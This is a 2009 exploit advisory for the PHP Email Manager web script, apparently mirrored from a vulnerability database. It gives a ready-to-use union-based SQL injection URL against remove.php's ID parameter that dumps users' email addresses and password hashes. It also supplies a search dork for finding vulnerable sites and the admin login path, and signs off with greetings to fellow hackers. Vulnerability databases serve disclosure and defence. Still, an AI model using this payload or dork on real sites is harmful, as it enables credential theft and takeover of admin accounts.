PHP Email Manager (remove.php ID) SQL Injection Vulnerability

2009-08-18T00:00:00
ID SSV:14626
Type seebug
Reporter Root
Modified 2009-08-18T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ===========================================|->
      ~ Mtrb3 hena [Security-Code] ~
===========================================|->

script :-> PHP Email Manager  < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

from :-> [WwW.SeC-CoDe.com]

C0ntact :a7m@mail.com

===========================================|->
              ~  Exploit ~
===========================================|->

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--

Admin Login:-> http//www.site.com/PHPEmailManager/login.php


-:::::::::::::::::: GreeetZ:::::::::::::::::-

Sniper.vb , Mr.Nrfzh,and all friends

Bay Bay

# sebug.net